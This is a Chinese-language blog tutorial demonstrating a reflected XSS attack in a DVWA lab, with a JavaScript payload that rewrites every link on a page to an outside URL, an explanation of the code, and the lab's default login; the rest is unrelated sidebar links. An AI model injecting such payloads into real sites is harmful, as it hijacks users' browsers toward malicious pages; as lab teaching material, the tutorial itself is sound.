当前位置:网站首页>XX攻击——反射型 XSS 攻击劫持用户浏览器
XX攻击——反射型 XSS 攻击劫持用户浏览器
2022-07-01 08:06:00 【Cwillchris】
我们先构建一个反射型的 XSS 攻击跳转到存在漏洞的页面。其实也可以在 DVWA 中直接进行攻击,但是我们处于演示目的构造了一个相对复杂的环境。
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript 代码分析 window.onload 当网页加载完成时,执行 function 匿名函数
函数功能:document.getElementsByTagName 获取页面中所有的 a 标签,存放到 link 数组中,使用 for 循环将 link 数组中的所有元素替换为恶意网址。
打开 chrome 浏览器,我们在反射型 XSS 中进行测试效果
登录 http://192.168.98.66/DVWA-master/login.php 用户名: admin 密码:password ,改为low级别
边栏推荐
- EDA open source simulation tool verilator beginner 6: debugging examples
- [MySQL learning notes 28] storage function
- 【Redis】一气呵成,带你了解Redis安装与连接
- 【入门】输入整型数组和排序标识,对其元素按照升序或降序进行排序
- OJ输入输出练习
- 【入门】提取不重复的整数
- [staff] key number (key number identification position | key number marking list | a major key identification principle | F, C, G position marking ascending | F major key identification principle | B
- Two expressions of string
- The Windows C disk is full
- [getting started] input n integers and output the smallest K of them
猜你喜欢
Instead of houses, another kind of capital in China is rising
web254
Wang Yingqi, founder of ones, talks to fortune (Chinese version): is there any excellent software in China?
凸印的印刷原理及工艺介绍
window c盘满了
Latex table
OJ input and output exercise
源代码加密的意义和措施
![[staff] high and low octave mark (the notes in the high octave mark | mark range are increased by one octave as a whole | low octave mark | mark range are decreased by one octave as a whole)](/img/ff/ebd936eaa6e57b1eabb691b0642957.jpg)
[staff] high and low octave mark (the notes in the high octave mark | mark range are increased by one octave as a whole | low octave mark | mark range are decreased by one octave as a whole)
【无标题】
随机推荐
2022.6.30 省赛+蓝桥国赛记录
5大组合拳,解决校园6大难题,护航教育信息化建设
web254
sqlalchemy创建MySQL_Table
How relational databases work
源代码加密的意义和措施
Aardio - Shadow Gradient Text
LSTM of RNN
window c盘满了
数字转excel的字符串坐标
Basic number theory -- combinatorial number
【mysql学习笔记26】视图
How to get a SharePoint online site created using the office365 group template
Access report realizes subtotal function
Keithley 2100 software 𞓜 Keithley2400 test software ns SourceMeter
Basic knowledge of MATLAB
量化交易之读书篇 - 《征服市场的人》读书笔记
Saving db4i depth camera pictures with MATLAB
【入门】提取不重复的整数
AArdio - 【问题】bass库回调时内存增长的问题